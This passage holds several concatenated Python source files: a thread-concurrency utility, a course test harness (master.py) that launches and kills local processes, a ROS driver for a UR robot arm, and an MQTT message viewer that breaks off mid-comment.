as context managers or callables, and then either enter the contexts or call the callables. 
""" objs = list(objs) # Treat keyword arguments passed as callables should be left as callables; # otherwise, override the parameter params = dict( catch=False, nones=False, traceback_delay=False, flatten=True, name=None ) def merge_inputs(dicts: list, candidates: list): """Merge nested returns and check for return data key conflicts in the callable """ ret = {} for name, d in dicts: common = set(ret.keys()).difference(d.keys()) if len(common) > 0: which = ", ".join(common) msg = f"attempting to merge results and dict arguments, but the key names ({which}) conflict in nested calls" raise KeyError(msg) ret.update(d) conflicts = set(ret.keys()).intersection([n for (n, obj) in candidates]) if len(conflicts) > 0: raise KeyError("keys of conflict in nested return dictionary keys with ") return ret def merge_results(inputs, result): for k, v in dict(result).items(): if isdictducktype(v.__class__): conflicts = set(v.keys()).intersection(start_keys) if len(conflicts) > 0: conflicts = ",".join(conflicts) raise KeyError( f"conflicts in keys ({conflicts}) when merging return dictionaries" ) inputs.update(result.pop(k)) # Pull parameters from the passed keywords for name in params.keys(): if name in kws and not callable(kws[name]): params[name] = kws.pop(name) if params["name"] is None: # come up with a gobbledigook name that is at least unique frame = inspect.currentframe().f_back.f_back params[ "name" ] = f"<{frame.f_code.co_filename}:{frame.f_code.co_firstlineno} call 0x{hashlib.md5().hexdigest()}>" # Combine the position and keyword arguments, and assign labels allobjs = list(objs) + list(kws.values()) names = (len(objs) * [None]) + list(kws.keys()) candidates = list(zip(names, allobjs)) del allobjs, names dicts = [] # Make sure candidates are either (1) all context managers # or (2) all callables. Decide what type of operation to proceed with. runner = None for i, (k, obj) in enumerate(candidates): # pass through dictionary objects from nested calls if isdictducktype(obj.__class__): dicts.append(candidates.pop(i)) continue thisone = RUNNERS[ ( callable(obj) and not isinstance(obj, _GeneratorContextManager) ), # Is it callable? ( hasattr(obj, "__enter__") or isinstance(obj, _GeneratorContextManager) ), # Is it a context manager? 
] if thisone is None: msg = f"each argument must be a callable and/or a context manager, " if k is None: msg += f"but given {repr(obj)}" else: msg += f"but given {k}={repr(obj)}" raise TypeError(msg) elif runner in (None, "both"): runner = thisone else: if thisone not in (runner, "both"): raise TypeError( f"cannot run a mixture of context managers and callables" ) # Enforce uniqueness in the (callable or context manager) object candidate_objs = [c[1] for c in candidates] if len(set(candidate_objs)) != len(candidate_objs): raise ValueError("each callable and context manager must be unique") if runner is None: return {} elif runner == "both": raise TypeError( "all objects supported both calling and context management - not sure which to run" ) elif runner == "context": if len(dicts) > 0: raise ValueError( f"unexpected return value dictionary argument for context management {dicts}" ) return MultipleContexts(flexible_caller, params, candidates) else: ret = merge_inputs(dicts, candidates) result = flexible_caller(params, candidates) start_keys = set(ret.keys()).union(result.keys()) if params["flatten"]: merge_results(ret, result) ret.update(result) return ret @hide_in_traceback def concurrently_call(params: dict, name_func_pairs: list) -> dict: global concurrency_count def traceback_skip(exc_tuple, count): """Skip the first `count` traceback entries in an exception. """ tb = exc_tuple[2] for i in range(count): if tb is not None and tb.tb_next is not None: tb = tb.tb_next return exc_tuple[:2] + (tb,) def check_thread_support(func_in): """Setup threading (concurrent execution only), including checks for whether a Device instance indicates it supports concurrent execution or not. """ func = func_in.func if isinstance(func_in, Call) else func_in if hasattr(func, "__self__") and not getattr( func.__self__, "concurrency", True ): # is this a Device that does not support concurrency? 
raise ConcurrentException(f"{func.__self__} does not support concurrency") return func_in stop_request_event.clear() results = {} catch = params["catch"] traceback_delay = params["traceback_delay"] # Setup calls then funcs # Set up mappings between wrappers, threads, and the function to call wrappers = Call.wrap_list_to_dict(name_func_pairs) threads = {name: Thread(target=w, name=name) for name, w in wrappers.items()} # Start threads with calls to each function finished = Queue() for name, thread in list(threads.items()): wrappers[name].set_queue(finished) thread.start() concurrency_count += 1 # As each thread ends, collect the return value and any exceptions tracebacks = [] parent_exception = None t0 = time.perf_counter() while len(threads) > 0: try: called = finished.get(timeout=0.25) except Empty: if time.perf_counter() - t0 > 60 * 15: names = ",".join(list(threads.keys())) logger.debug(f"{names} threads are still running") t0 = time.perf_counter() continue except BaseException as e: parent_exception = e stop_request_event.set() called = None if called is None: continue # Below only happens when called is not none if parent_exception is not None: names = ", ".join(list(threads.keys())) logger.error( f"raising {parent_exception.__class__.__name__} in main thread after child threads {names} return" ) # if there was an exception that wasn't us ending the thread, # show messages if called.traceback is not None: tb = traceback_skip(called.traceback, 1) if called.traceback[0] is not ThreadEndedByMaster: # exception_count += 1 tracebacks.append(tb) last_exception = called.traceback[1] if not traceback_delay: try: traceback.print_exception(*tb) except BaseException as e: sys.stderr.write( "\nthread exception, but failed to print exception" ) sys.stderr.write(str(e)) sys.stderr.write("\n") else: if params["nones"] or called.result is not None: results[called.name] = called.result # Remove this thread from the dictionary of running threads del threads[called.name] concurrency_count -= 1 # Clear the stop request, if there are no other threads that # still need to exit if concurrency_count == 0 and stop_request_event.is_set(): stop_request_event.clear() # Raise exceptions as necessary if parent_exception is not None: for h in logger.logger.handlers: h.flush() for tb in tracebacks: try: traceback.print_exception(*tb) except BaseException: sys.stderr.write("\nthread error (fixme to print message)") sys.stderr.write("\n") raise parent_exception elif len(tracebacks) > 0 and not catch: for h in logger.logger.handlers: h.flush() if len(tracebacks) == 1: raise last_exception else: for tb in tracebacks: try: traceback.print_exception(*tb) except BaseException: sys.stderr.write("\nthread error (fixme to print message)") sys.stderr.write("\n") ex = ConcurrentException(f"{len(tracebacks)} call(s) raised exceptions") ex.thread_exceptions = tracebacks raise ex return results @hide_in_traceback def concurrently(*objs, **kws): r"""If `*objs` are callable (like functions), call each of `*objs` in concurrent threads. If `*objs` are context managers (such as Device instances to be connected), enter each context in concurrent threads. Multiple references to the same function in `objs` only result in one call. The `catch` and `nones` arguments may be callables, in which case they are executed (and each flag value is treated as defaults). 
Arguments: objs: each argument may be a callable (function or class that defines a __call__ method), or context manager (such as a Device instance) catch: if `False` (the default), a `ConcurrentException` is raised if any of `funcs` raise an exception; otherwise, any remaining successful calls are returned as normal nones: if not callable and evalues as True, includes entries for calls that return None (default is False) flatten: if `True`, results of callables that returns a dictionary are merged into the return dictionary with update (instead of passed through as dictionaries) traceback_delay: if `False`, immediately show traceback information on a thread exception; if `True` (the default), wait until all threads finish Returns: the values returned by each call :rtype: dictionary keyed by function name Here are some examples: :Example: Call each function `myfunc1` and `myfunc2`, each with no arguments: >>> def do_something_1 (): >>> time.sleep(0.5) >>> return 1 >>> def do_something_2 (): >>> time.sleep(1) >>> return 2 >>> rets = concurrent(myfunc1, myfunc2) >>> rets[do_something_1] :Example: To pass arguments, use the Call wrapper >>> def do_something_3 (a,b,c): >>> time.sleep(2) >>> return a,b,c >>> rets = concurrent(myfunc1, Call(myfunc3,a,b,c=c)) >>> rets[do_something_3] a, b, c **Caveats** - Because the calls are in different threads, not different processes, this should be used for IO-bound functions (not CPU-intensive functions). - Be careful about thread safety. When the callable object is a Device method, :func concurrency: checks the Device object state.concurrency for compatibility before execution. If this check returns `False`, this method raises a ConcurrentException. """ return enter_or_call(concurrently_call, objs, kws) @hide_in_traceback def sequentially_call(params: dict, name_func_pairs: list) -> dict: """Emulate `concurrently_call`, with sequential execution. This is mostly only useful to guarantee compatibility with `concurrently_call` dictionary-style returns. """ results = {} wrappers = Call.wrap_list_to_dict(name_func_pairs) # Run each callable for name, wrapper in wrappers.items(): ret = wrapper() if ret is not None or params["nones"]: results[name] = ret return results @hide_in_traceback def sequentially(*objs, **kws): r"""If `*objs` are callable (like functions), call each of `*objs` in the given order. If `*objs` are context managers (such as Device instances to be connected), enter each context in the given order, and return a context manager suited for a `with` statement. This is the sequential implementation of the `concurrently` function, with a compatible convention of returning dictionaries. Multiple references to the same function in `objs` only result in one call. The `nones` argument may be callables in case they are executed (and each flag value is treated as defaults). 
Arguments: objs: each argument may be a callable (function, or class that defines a __call__ method), or context manager (such as a Device instance) kws: dictionary of further callables or context managers, with names set by the dictionary key nones: if True, include dictionary entries for calls that return None (default is False); left as another entry in `kws` if callable or a context manager flatten: if `True`, results of callables that returns a dictionary are merged into the return dictionary with update (instead of passed through as dictionaries) Returns: a dictionary keyed on the object name containing the return value of each function :rtype: dictionary of keyed by function Here are some examples: :Example: Call each function `myfunc1` and `myfunc2`, each with no arguments: >>> def do_something_1 (): >>> time.sleep(0.5) >>> return 1 >>> def do_something_2 (): >>> time.sleep(1) >>> return 2 >>> rets = concurrent(myfunc1, myfunc2) >>> rets[do_something_1] 1 :Example: To pass arguments, use the Call wrapper >>> def do_something_3 (a,b,c): >>> time.sleep(2) >>> return a,b,c >>> rets = concurrent(myfunc1, Call(myfunc3,a,b,c=c)) >>> rets[do_something_3] a, b, c **Caveats** - Unlike `concurrently`, an exception in a context manager's __enter__ means that any remaining context managers will not be entered. When the callable object is a Device method, :func concurrency: checks the Device object state.concurrency for compatibility before execution. If this check returns `False`, this method raises a ConcurrentException. """ return enter_or_call(sequentially_call, objs, kws) OP_CALL = "op" OP_GET = "get" OP_SET = "set" OP_QUIT = None class ThreadDelegate(object): _sandbox = None _obj = None _dir = None _repr = None def __init__(self, sandbox, obj, dir_, repr_): self._sandbox = sandbox self._obj = obj self._dir = dir_ self._repr = repr_ @hide_in_traceback def __call__(self, *args, **kws): return message(self._sandbox, OP_CALL, self._obj, None, args, kws) def __getattribute__(self, name): if name in delegate_keys: return object.__getattribute__(self, name) else: return message(self._sandbox, OP_GET, self._obj, name, None, None) def __dir__(self): return self._dir def __repr__(self): return f"ThreadDelegate({self._repr})" def __setattr__(self, name, value): if name in delegate_keys: return object.__setattr__(self, name, value) else: return message(self._sandbox, OP_SET, self._obj, name, value, None) delegate_keys = set(ThreadDelegate.__dict__.keys()).difference(object.__dict__.keys()) @hide_in_traceback def message(sandbox, *msg): req, rsp = sandbox._requestq, Queue(1) # Await and handle request. Exception should be raised in this # (main) thread req.put(msg + (rsp,), True) ret, exc = rsp.get(True) if exc is not None: raise exc return ret class ThreadSandbox(object): """Execute all calls in the class in a separate background thread. This is intended to work around challenges in threading wrapped win32com APIs. Use it as follows: obj = ThreadSandbox(MyClass(myclassarg, myclasskw=myclassvalue)) Then use `obj` as a normal MyClass instance. 
""" __repr_root__ = "uninitialized ThreadSandbox" __dir_root__ = [] __thread = None _requestq = None def __init__(self, factory, should_sandbox_func=None): # Start the thread and block until it's ready self._requestq = Queue(1) ready = Queue(1) self.__thread = Thread( target=self.__worker, args=(factory, ready, should_sandbox_func) ) self.__thread.start() exc = ready.get(True) if exc is not None: raise exc @hide_in_traceback def __worker(self, factory, ready, sandbox_check_func): """This is the only thread allowed to access the protected object.""" try: root = factory() def default_sandbox_check_func(obj): try: return inspect.getmodule(obj).__name__.startswith( inspect.getmodule(root).__name__ ) except AttributeError: return False if sandbox_check_func is None: sandbox_check_func = default_sandbox_check_func self.__repr_root__ = repr(root) self.__dir_root__ = sorted(list(set(dir(root) + list(sandbox_keys)))) exc = None except Exception as e: exc = e finally: ready.put(exc, True) if exc: return # Do some sort of setup here while True: ret = None exc = None op, obj, name, args, kws, rsp = self._requestq.get(True) # End if that's good if op is OP_QUIT: break if obj is None: obj = root # Do the op try: if op is OP_GET: ret = getattr(obj, name) elif op is OP_CALL: ret = obj(*args, **kws) elif op is OP_SET: ret = setattr(obj, name, args) # Make it a delegate if it needs to be protected if sandbox_check_func(ret): ret = ThreadDelegate(self, ret, dir_=dir(ret), repr_=repr(ret)) # Catch all exceptions except Exception as e: exc = e exc = e rsp.put((ret, exc), True) logger.debug("ThreadSandbox worker thread finished") @hide_in_traceback def __getattr__(self, name): if name in sandbox_keys: return object.__getattribute__(self, name) else: return message(self, OP_GET, None, name, None, None) @hide_in_traceback def __setattr__(self, name, value): if name in sandbox_keys: return object.__setattr__(self, name, value) else: return message(self, OP_SET, None, name, value, None) def _stop(self): message(self, OP_QUIT, None, None, None, None, None) def _kill(self): if isinstance(self.__thread, Thread): self.__thread.join(0) else: raise Exception("no thread running to kill") def __del__(self): try: del_ = message(self, OP_GET, None, "__del__", None, None) except AttributeError: pass else: del_() finally: try: self._kill() except BaseException: pass def __repr__(self): return f"ThreadSandbox({self.__repr_root__})" def __dir__(self): return self.__dir_root__ sandbox_keys = set(ThreadSandbox.__dict__.keys()).difference(object.__dict__.keys()) class ConfigStore: """Define dictionaries of configuration value traits in subclasses of this object. Each dictionary should be an attribute of the subclass. The all() class method returns a flattened dictionary consisting of all values of these dictionary attributes, keyed according to '{attr_name}_{attr_key}', where {attr_name} is the name of the dictionary attribute and {attr_key} is the nested dictionary key. 
""" @classmethod def all(cls): """Return a dictionary of all attributes in the class""" ret = {} for k, v in cls.__dict__.items(): if isinstance(v, dict) and not k.startswith("_"): ret.update([(k + "_" + k2, v2) for k2, v2 in v.items()]) return ret @classmethod def frame(cls): """Return a pandas DataFrame containing all attributes in the class """ import pandas as pd df = pd.DataFrame([cls.all()]).T df.columns.name = "Value" df.index.name = "Parameter" return df import ast import textwrap import re def accessed_attributes(method): """enumerate the attributes of the parent class accessed by `method` :method: callable that is a method or defined in a class Returns: tuple of attribute names """ # really won't work unless method is a callable defined inside a class if not inspect.isroutine(method): raise ValueError(f"{method} is not a method") elif not inspect.ismethod(method) and "." not in method.__qualname__: raise ValueError(f"{method} is not defined in a class") # parse into a code tree source = inspect.getsource(method) # filter out lines that start with comments, which have no tokens and confuse textwrap.dedent source = "\n".join(re.findall("^[\ \t\r\n]*[^\#].*", source, re.MULTILINE)) parsed = ast.parse(textwrap.dedent(source)) if len(parsed.body) > 1: # this should not be possible raise Exception("ast parsing gave unexpected extra nodes") # pull out the function node and the name for the class instance func = parsed.body[0] if not isinstance(func, ast.FunctionDef): raise SyntaxError("this object doesn't look like a method") self_name = func.args.args[0].arg def isselfattr(node): return ( isinstance(node, ast.Attribute) and getattr(node.value, "id", None) == self_name ) return tuple({node.attr for node in ast.walk(func) if isselfattr(node)})
master.py
""" The master program for CS5414 project 0 """ import os import signal import subprocess import sys import time import platform from socket import SOCK_STREAM, socket, AF_INET from threading import Thread address = 'localhost' threads = {} # ends up keeping track of who is alive wait_ack = False class ClientHandler(Thread): def __init__(self, index, address, port, process): Thread.__init__(self) self.index = index self.sock = socket(AF_INET, SOCK_STREAM) self.sock.connect((address, port)) self.buffer = "" self.valid = True self.process = process def run(self): global threads, wait_ack while self.valid: if "\n" in self.buffer: (l, rest) = self.buffer.split("\n", 1) self.buffer = rest s = l.split() if s[0] == 'messages': sys.stdout.write(l + '\n') sys.stdout.flush() wait_ack = False elif s[0] == 'alive': sys.stdout.write(l + '\n') sys.stdout.flush() wait_ack = False else: print("Invalid Response: " + l) else: try: data = self.sock.recv(1024) # sys.stderr.write(data) self.buffer += data except: # print(sys.exc_info()) self.valid = False del threads[self.index] self.sock.close() break def kill(self): if self.valid: if platform.system() == 'Darwin': # MacOS self.send('crash\n') else: os.killpg(os.getpgid(self.process.pid), signal.SIGKILL) self.close() def send(self, s): if self.valid: self.sock.send(str(s) + '\n') def close(self): try: self.valid = False self.sock.close() except: pass def kill(index): global wait_ack, threads wait = wait_ack while wait: time.sleep(0.01) wait = wait_ack pid = int(index) if pid >= 0: if pid not in threads: print('Master or testcase error!') return threads[pid].kill() def send(index, data, set_wait_ack=False): global threads, wait_ack wait = wait_ack while wait: time.sleep(0.01) wait = wait_ack pid = int(index) if pid >= 0: if pid not in threads: print('Master or testcase error!') return if set_wait_ack: wait_ack = True threads[pid].send(data) return if set_wait_ack: wait_ack = True threads[pid].send(data) def exit(force=False): global threads, wait_ack wait = wait_ack wait = wait and (not force) while wait: time.sleep(0.01) wait = wait_ack for k in threads: kill(k) subprocess.Popen(['./stopall'], stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w')) time.sleep(0.1) if debug: print("Goodbye :)") sys.exit(0) def timeout(): time.sleep(120) print('Timeout!') exit(True) def main(debug=False): global threads, wait_ack timeout_thread = Thread(target=timeout, args=()) timeout_thread.setDaemon(True) timeout_thread.start() if debug: print("Master started") while True: line = '' try: line = sys.stdin.readline() except: # keyboard exception, such as Ctrl+C/D exit(True) if line == '': # end of a file exit() line = line.strip() # remove trailing '\n' if line == '': # prompt again if just whitespace continue if line == 'exit': # exit when reading 'exit' command if debug: print("Received exit command. 
Terminating...") exit() sp1 = line.split(None, 1) sp2 = line.split() if len(sp1) != 2: # validate input print("Invalid command: " + line) continue if sp1[0] == 'sleep': # sleep command time.sleep(float(sp1[1]) / 1000) continue try: pid = int(sp2[0]) # first field is pid except ValueError: print("Invalid pid: " + sp2[0]) exit(True) cmd = sp2[1] # second field is command if cmd == 'start': try: port = int(sp2[3]) except ValueError: print("Invalid port: " + sp2[3]) exit(True) if debug: process = subprocess.Popen(['./process', str(pid), sp2[2], sp2[3]], preexec_fn=os.setsid) else: process = subprocess.Popen(['./process', str(pid), sp2[2], sp2[3]], stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w'), preexec_fn=os.setsid) # sleep for a while to allow the process be ready time.sleep(3) # connect to the port of the pid handler = ClientHandler(pid, address, port, process) threads[pid] = handler handler.start() elif cmd == 'get' or cmd == 'alive': send(pid, sp1[1], set_wait_ack=True) elif cmd == 'broadcast': send(pid, sp1[1]) elif cmd == 'crash': kill(pid) time.sleep(1) # sleep for a bit so that crash is detected else: print("Invalid command: " + line) if __name__ == '__main__': debug = False if len(sys.argv) > 1 and sys.argv[1] == 'debug': debug = True main(debug)
ur_driver_lite.py
#!/usr/bin/env python3 # http://wiki.ros.org/ROS/Tutorials/WritingPublisherSubscriber%28python%29 import rospy import threading import socket import time import math import ur_rtde import os import geometry_msgs.msg import std_msgs.msg import pyquaternion # pip install pyquaternion # http://kieranwynn.github.io/pyquaternion import tf class Driver(): """The Driver class does a couple of things: 1: It sets up a few ros publishers that constantly publish some information from the robot. It uses the the Real Time Data Exchange (rtde) to get data from the robot then uses a seperate publishing thread to publish it on ROS topics 2: It constantly tries to ensure that the robot is running the correct ur script. For the driver to work, the robot needs to be running a custom ur script that communicates with the driver. The program loop checks if there is a healthy heartbeat between the robot and the driver. If the heartbeat is unhealthy the ur script is continuously send to the robot. 3: It subscribes to a heap of movement and gripper topics. When it receives messages it will move the robot respectively.""" class Registers(): """ This sub class just contains a heap of constants that describe what rtde registers have been used for""" X = "input_double_register_0" Y = "input_double_register_1" Z = "input_double_register_2" RX = "input_double_register_3" RY = "input_double_register_4" RZ = "input_double_register_5" GRIPPER_POS_INPUT = "input_double_register_6" GRIPPER_SPEED_INPUT = "input_double_register_7" GRIPPER_FORCE_INPUT = "input_double_register_8" GRIPPER_POS_OUTPUT = "output_double_register_0" GRIPPER_OBJ_DETECTED_OUTPUT = "output_int_register_3" HEARTBEAT_INPUT = "input_int_register_0" HEARTBEAT_OUTPUT = "output_int_register_0" MOVEMENT_COUNTER_INPUT = "input_int_register_1" MOVEMENT_COUNTER_OUTPUT = "output_int_register_1" GRIPPER_COUNTER_INPUT = "input_int_register_2" GRIPPER_COUNTER_OUTPUT = "output_int_register_2" MOVEMENT_TYPE = "input_int_register_3" def __init__(self,robot_ip_address): self.robot_ip_address = robot_ip_address self.alive = True self.publish_loop_thread = threading.Thread(target=self.__publish_loop, name="Publish Thread") self.program_loop_thread = threading.Thread(target=self.__program_loop, name="Program Thread") self.real_time_data_exchange = ur_rtde.UrRealTimeDataExchange(robot_ip_address) self.movement_counter = 0 self.gripper_counter = 0 def __enter__(self): print("ur_driver_lite enter called") rospy.init_node("ur_driver_lite") rospy.Subscriber("move_to_pose",geometry_msgs.msg.Transform,self.__move_to_pose_callback) rospy.Subscriber("servo_to_pose",geometry_msgs.msg.Transform,self.__servo_to_pose_callback) rospy.Subscriber("move_at_speed",geometry_msgs.msg.Twist,self.__move_at_speed_callback) rospy.Subscriber("move_gripper_to_pos",std_msgs.msg.Float32,self.__gripper_pos_callback) self.tcp_force_pub = rospy.Publisher("tcp_wrench",geometry_msgs.msg.Wrench,queue_size=10) self.joint_angle_pub = rospy.Publisher("joint_angle",std_msgs.msg.Float32MultiArray,queue_size=10) self.gripper_pos_pub = rospy.Publisher("gripper_pos",std_msgs.msg.Float32,queue_size=10) self.gripper_obj_detected_pub = rospy.Publisher("gripper_obj_detected",std_msgs.msg.Bool,queue_size=10) self.real_time_data_exchange.__enter__() self.publish_loop_thread.start() self.program_loop_thread.start() print("ur_driver_lite enter complete") return self def __exit__(self,*args): print("exit called") self.alive = False self.publish_loop_thread.join() self.program_loop_thread.join() 
self.real_time_data_exchange.__exit__(args) print("exit complete") def __publish_loop(self): """ The publish loop should be called from another thread. It will run continuously to get data from the real time data exchange and publish it on ros """ #instanciate transform broadcaster so that we can broadcast tcp and #camera position br = tf.TransformBroadcaster() #publish while alive while self.alive: #create a dict of the variables we want to read from the rtde output_data = { "actual_TCP_pose":None, "actual_TCP_force":None, Driver.Registers.GRIPPER_POS_OUTPUT:None, Driver.Registers.GRIPPER_OBJ_DETECTED_OUTPUT:None, "actual_q":None } #read the data from the rtde into our dict self.real_time_data_exchange.get_output_data(output_data) #Get tcp pose in the form [x,y,z,rx,ry,rz]. Note rotation uses axis angle tcp_pose = output_data["actual_TCP_pose"] #get the translations as [x,y,z] t = tcp_pose[0:3] #The rotation angle is the length of the vector [rx,ry,rz]. Pythagoras yo angle = math.sqrt( tcp_pose[3]**2 + tcp_pose[4]**2 + tcp_pose[5]**2 ) #create ros quaternion from angle and axis q = tf.transformations.quaternion_about_axis(angle,tcp_pose[3:6]) #publish robot tool center point with respect to robot base br.sendTransform(t,q,rospy.Time.now(),"ur_tcp","base") # q1 = tf.transformations.quaternion_about_axis(90/180.0*math.pi,(0,0,1)) q2 = tf.transformations.quaternion_about_axis(-104/180.0*math.pi,(0,1,0)) q3 = tf.transformations.quaternion_multiply(q1,q2) br.sendTransform((0.0,-0.065,0.04),q3,rospy.Time.now(),"camera_link","ur_tcp",) # publish robot gripper: br.sendTransform((0.0,0.0,0.2485),(0,0,0,1),rospy.Time.now(),"gripper_point","ur_tcp",) #publish the robots force and torque fx,fy,fz,tx,ty,tz = output_data["actual_TCP_force"] force = geometry_msgs.msg.Vector3(fx,fy,fz) torque = geometry_msgs.msg.Vector3(tx,ty,tz) wrench_msg = geometry_msgs.msg.Wrench(force,torque) self.tcp_force_pub.publish(wrench_msg) #publish the joint angles (actual q) actualQ = output_data["actual_q"] jointAngles = std_msgs.msg.Float32MultiArray(data=actualQ) self.joint_angle_pub.publish(jointAngles) #publish gripper feedback self.gripper_pos_pub.publish( output_data[Driver.Registers.GRIPPER_POS_OUTPUT] ) self.gripper_obj_detected_pub.publish( output_data[Driver.Registers.GRIPPER_OBJ_DETECTED_OUTPUT] ) #print(output_data["actual_TCP_force"]) time.sleep(0.01) def __program_loop(self): while self.alive: try: self.secondary_client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #self.secondary_client_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)#not sure if this is needed by just copied this #self.secondary_client_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)#not sure if this is needed by just copied this self.secondary_client_socket.settimeout(1) self.secondary_client_socket.connect((self.robot_ip_address, 30002)) dir_path = os.path.dirname(os.path.realpath(__file__)) + "/robot_ur_script" with open(dir_path, "rb") as f: script = f.read() while self.alive: self.secondary_client_socket.sendall(script) last_time = time.time() inputs = {Driver.Registers.HEARTBEAT_INPUT:0} outputs = {Driver.Registers.HEARTBEAT_OUTPUT:0} while self.alive: self.real_time_data_exchange.set_input_data(inputs) self.real_time_data_exchange.get_output_data(outputs) if inputs[Driver.Registers.HEARTBEAT_INPUT] == outputs[Driver.Registers.HEARTBEAT_OUTPUT]: inputs[Driver.Registers.HEARTBEAT_INPUT] += 1 last_time = time.time() if time.time() - last_time > 2.0: print("Program watchdog timeout") break 
time.sleep(0.1) self.secondary_client_socket.sendall("speedj([0,0,0,0,0,0],a=1.0)\n") except (OSError,socket.timeout,socket.error) as e: time.sleep(0.5) except Exception as e: self.alive = False raise e finally: pass def __move_to_pose_callback(self,data): t = data.translation r = data.rotation q = pyquaternion.Quaternion(r.w,r.x,r.y,r.z) axis_angle = q.axis axis_angle[0] *= q.radians axis_angle[1] *= q.radians axis_angle[2] *= q.radians self.movement_counter += 1 input_dict = { Driver.Registers.X: t.x, Driver.Registers.Y: t.y, Driver.Registers.Z: t.z, Driver.Registers.RX: axis_angle[0], Driver.Registers.RY: axis_angle[1], Driver.Registers.RZ: axis_angle[2], Driver.Registers.MOVEMENT_TYPE : 1, #movment type Driver.Registers.MOVEMENT_COUNTER_INPUT : self.movement_counter } self.real_time_data_exchange.set_input_data(input_dict) def __servo_to_pose_callback(self,data): t = data.translation r = data.rotation q = pyquaternion.Quaternion(r.w,r.x,r.y,r.z) axis_angle = q.axis axis_angle[0] *= q.radians axis_angle[1] *= q.radians axis_angle[2] *= q.radians self.movement_counter += 1 input_dict = { Driver.Registers.X: t.x, Driver.Registers.Y: t.y, Driver.Registers.Z: t.z, Driver.Registers.RX: axis_angle[0], Driver.Registers.RY: axis_angle[1], Driver.Registers.RZ: axis_angle[2], Driver.Registers.MOVEMENT_TYPE : 2, #movment type Driver.Registers.MOVEMENT_COUNTER_INPUT : self.movement_counter } self.real_time_data_exchange.set_input_data(input_dict) def __move_at_speed_callback(self,data): linear = data.linear angular = data.angular self.movement_counter += 1 input_dict = { Driver.Registers.X: linear.x, Driver.Registers.Y: linear.y, Driver.Registers.Z: linear.z, Driver.Registers.RX: angular.x, Driver.Registers.RY: angular.y, Driver.Registers.RZ: angular.z, Driver.Registers.MOVEMENT_TYPE : 3, #movment type Driver.Registers.MOVEMENT_COUNTER_INPUT : self.movement_counter } self.real_time_data_exchange.set_input_data(input_dict) def __gripper_pos_callback(self,data): self.gripper_counter += 1 input_dict = { Driver.Registers.GRIPPER_POS_INPUT: data.data, Driver.Registers.GRIPPER_SPEED_INPUT: 100.0, Driver.Registers.GRIPPER_FORCE_INPUT: 100.0, Driver.Registers.GRIPPER_COUNTER_INPUT : self.gripper_counter } self.real_time_data_exchange.set_input_data(input_dict) if __name__ == "__main__": with Driver("10.90.184.11") as driver: print("ur driver starting spin") rospy.spin()
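
# --- Hedged usage sketch (added for illustration; not part of the original source) ---
# A minimal companion node that commands the Driver above over its ROS topics.
# It is kept commented out so it does not alter this file's behavior. It assumes
# the driver node is already running and uses the topic names registered in
# Driver.__enter__ ('move_to_pose' and 'move_gripper_to_pos'); the pose values
# themselves are made up for illustration.
#
#   import rospy
#   import geometry_msgs.msg
#   import std_msgs.msg
#
#   rospy.init_node("ur_driver_lite_demo")
#   pose_pub = rospy.Publisher("move_to_pose", geometry_msgs.msg.Transform, queue_size=1)
#   grip_pub = rospy.Publisher("move_gripper_to_pos", std_msgs.msg.Float32, queue_size=1)
#   rospy.sleep(1.0)  # give the publishers time to connect
#
#   target = geometry_msgs.msg.Transform()
#   target.translation = geometry_msgs.msg.Vector3(0.3, 0.0, 0.4)
#   target.rotation = geometry_msgs.msg.Quaternion(0.0, 1.0, 0.0, 0.0)  # x, y, z, w
#   pose_pub.publish(target)  # handled by __move_to_pose_callback (movement type 1)
#
#   grip_pub.publish(std_msgs.msg.Float32(0.0))  # ask the gripper to move to position 0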
asmqttviewer.py
# Copyright 2021 Nokia
# Licensed under the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause

import paho.mqtt.client as mqtt
import paho.mqtt.subscribe as subscribe
import json
import ast
import threading

from colors import *


def processMessage(p, t):
    print("Message received ", p, t)
    m = ast.literal_eval(p.decode("ascii"))
    print(m, t, t == "AS/C")
    if t == "AS/IM":
        s = (
            m["t"].ljust(20)
            + " - "
            + m["op"].ljust(7)
            + m["data"]["kind"].ljust(10)
            + " "
            + m["data"]["itemid"]
        )
        print(color(s, fg="white"))
    elif t == "AS/C":
        s = (
            m["t"].ljust(20)
            + " - "
            + m["op"].ljust(7)
            + m["data"]["kind"].ljust(10)
            + " "
            + m["data"]["itemid"]
        )
        print(color(s, fg="cyan"))
    elif t == "AS/R":
        r = str(m["data"]["result"])
        s = (
            m["t"].ljust(20)
            + " - "
            + m["op"].ljust(7)
            + m["data"]["kind"].ljust(10)
            + " "
            + m["data"]["itemid"]
        )
        if r == "0":
            print(color(s, fg="green"), " ", color(r, fg="blue", bg="black"))
        elif r == "9001":
            print(color(s, fg="red"), " ", color(r, fg="yellow", bg="red"))
        else:
            print(color(s, fg="yellow"), " ", color(r, fg="blue", bg="orange"))
    else:
        # p is a bytes payload, so convert it before concatenating into the message
        print(color("UNEXPECTED INTERNAL ERROR " + t + " " + str(p), fg="orange"))


def on_connect(client, metadata, flags, rc):
    print(" +--- MQTT Client connected")


def on_disconnect(client, userdata, rc):
    # paho-mqtt 1.x invokes on_disconnect with (client, userdata, rc)
    print(" +--- MQTT Client disconnected, retrying connect")
    try:
        client.reconnect()
    except:
        print(" +--- MQTT client reconnection error")


def on_message(client, userdata, message):
    print("message")
    # x = threading.Thread(target=processMessage, args=(message.payload, message.topic,))
    # x.start()
    processMessage(message.payload, message.topic)


# MAIN
print("\n\nAS MQTT Terminal Viewer\n\n")

broker_port = 1883
# broker_port= 8560
# broker_url="10.144.176.146"
broker_url = "127.0.0.1"

client = mqtt.Client()
client.on_connect = on_connect
client.on_disconnect = on_disconnect  # register the handler defined above
client.on_message = on_message
client.connect(broker_url, broker_port)
print(" +--- MQTT Client connection is ", client)

client.subscribe("AS/R", qos=1)
client.subscribe("AS/C", qos=1)
client.subscribe("AS/IM", qos=1)
client.subscribe("AS/MQTTPING", qos=1)

print(" +--- Running, press ctrl+C to stop\n\n")
client.loop_start()
x = input("Press CTRL+C to stop")
print(" +--- Exiting.")
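
# --- Hedged usage sketch (added for illustration; not part of the original source) ---
# A small publisher that feeds the viewer above one sample message per outcome.
# It is kept commented out so it does not run as part of the viewer script.
# Field names ('t', 'op', 'data', 'kind', 'itemid', 'result') are taken from
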